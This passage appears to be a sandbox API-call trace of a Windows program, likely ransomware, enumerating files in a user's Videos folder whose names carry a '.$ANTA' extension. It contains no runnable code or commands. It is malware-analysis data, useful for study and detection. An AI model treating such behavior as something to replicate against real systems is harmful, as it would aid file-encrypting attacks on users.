[0103.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0103.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0103.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0103.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0103.120] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0103.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0103.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0103.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0103.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0103.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0103.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0103.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0103.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0103.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0103.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0103.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0103.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0103.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0103.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0103.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0103.122] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0103.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0103.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0103.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0103.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0103.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0103.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0103.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0103.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0103.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0103.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0103.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0103.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0103.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0103.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0103.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0103.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0103.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0103.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0103.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0103.122] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\*", lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83ec870, ftCreationTime.dwHighDateTime=0x1d5efe1, ftLastAccessTime.dwLowDateTime=0x997ca90, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x997ca90, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca8e0, cFileName=".", cAlternateFileName="")) returned 0x41ac700 [0103.123] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83ec870, ftCreationTime.dwHighDateTime=0x1d5efe1, ftLastAccessTime.dwLowDateTime=0x997ca90, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x997ca90, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca8e0, cFileName="..", cAlternateFileName="")) returned 1 [0103.123] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86948b9, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x86948b9, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x8859b83, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x18730, dwReserved0=0x0, dwReserved1=0x43ca8e0, cFileName="3lc9YJH.swf.$ANTA", cAlternateFileName="3LC9YJ~1.$AN")) returned 1 [0103.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0103.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0103.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0103.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0103.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0103.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0103.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0103.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0103.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0103.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0103.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.123] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0103.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0103.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0103.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0103.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0103.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.123] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0103.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0103.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0103.123] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0103.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0103.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0103.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0103.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0103.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0103.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0103.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0103.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0103.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0103.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0103.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0103.124] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0103.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0103.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0103.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0103.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0103.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.124] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0103.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0103.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0103.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0103.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0103.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0103.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0103.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0103.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0103.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0103.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0103.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0103.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0103.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca898 [0103.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0103.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0103.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0103.125] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0103.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.125] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0103.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0103.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0103.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0103.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.184] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x898ae8f, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x898ae8f, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x8a95f3e, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x8e20, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="GPtGPTImgDjIi0576udd.swf.$ANTA", cAlternateFileName="GPTGPT~1.$AN")) returned 1 [0103.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0103.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0103.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0103.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0103.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0103.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0103.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0103.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0103.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0103.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0103.184] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0103.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0103.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0103.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0103.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0103.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.185] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0103.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0103.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0103.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0103.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0103.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0103.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0103.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0103.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0103.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0103.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0103.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa00 [0103.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0103.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0103.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0103.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0103.185] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0103.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0103.186] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0103.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0103.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0103.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0103.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.186] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c1366c, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x8c1366c, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x8d1e7ef, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x15750, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="h8KMQ6UP_q4ir-v.mp4.$ANTA", cAlternateFileName="H8KMQ6~1.$AN")) returned 1 [0103.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0103.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0103.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0103.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0103.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0103.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0103.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0103.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0103.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0103.186] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0103.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9818 [0103.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0103.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0103.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0103.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.186] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0103.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0103.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0103.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0103.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0103.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0103.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0103.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0103.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0103.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0103.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0103.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0103.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0103.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca970 [0103.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0103.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0103.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0103.187] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0103.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0103.187] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0103.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0103.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0103.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0103.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0103.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0103.187] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90d8242, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x90d8242, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x91ef81b, 